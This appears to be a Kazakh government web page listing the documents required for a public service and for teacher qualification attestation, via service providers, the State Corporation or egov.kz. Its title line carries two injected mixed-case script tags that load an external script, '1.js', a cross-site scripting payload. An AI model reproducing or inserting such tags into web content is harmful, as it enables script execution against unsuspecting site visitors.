Мемлекеттік қызметті көрсету үшін қажетті құжаттар тізбесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
05.01.2024
Ø Көрсетілетін қызметті берушіге:
1) өтініш;
2) жеке басын куәландыратын құжат (жеке басын сәйкестендіру үшін талап етіледі) (иесіне қайтарылады) не цифрлық құжаттар сервисінен электрондық құжат (сәйкестендіру үшін);
3) білімі туралы диплом;
4) қайта даярлау курстарынан өткені туралы құжат (бар болса);
5) жұмыскердің еңбек қызметін растайтын құжат.
- Ақпараттық жүйе бойынша:
- өтініш.
- Мемлекеттік корпорацияға:
1) өтініш;
2) білімі туралы диплом;
3) қайта даярлау курстарынан өткені туралы құжат (бар болса);
4) жұмыскердің еңбек қызметін растайтын құжат.
- Еgov.kz электрондық үкімет веб-порталы арқылы:
1) өтініш
2) білімі туралы диплом;
3) қайта даярлау курстарынан өткені туралы құжат (бар болса);
4) жұмыскердің еңбек қызметін растайтын құжат.
Білімі және еңбек қызметі туралы деректер электрондық үкімет шлюзі арқылы тиісті мемлекеттік органдардың ақпараттық жүйелерінен алынады. Ақпарат болмаған жағдайда өтініш беруші растайтын құжаттарды қоса береді.
- Бұл ретте аттестаттаудан өту үшін тиісті деңгейдегі аттестаттау комиссиясы ақпараттық жүйе бойынша мынадай деректерді сұратады:
1) біліктілік санатын беру туралы куәлік және бұйрық (бұрын біліктілік санаты болған адамдар үшін);
2) кәсіби жетістіктерін растайтын құжаттар;
3) педагог-зерттеуші» немесе «педагог-шебер» біліктілік санатына-тәжірибені жинақтау;
4) сабақтарды талдау, әріптестердің, басшының орынбасарларының, басшының, әдіскерлердің, ата-аналардың пікірлері;
5) осы Қағидаларға 31-қосымшаға сәйкес педагогикалық кеңес отырысының хаттамасынан үзінді;
6) осы Қағидалармен бекітілген бағалау өлшемшарттарынан туындайтын құжаттар.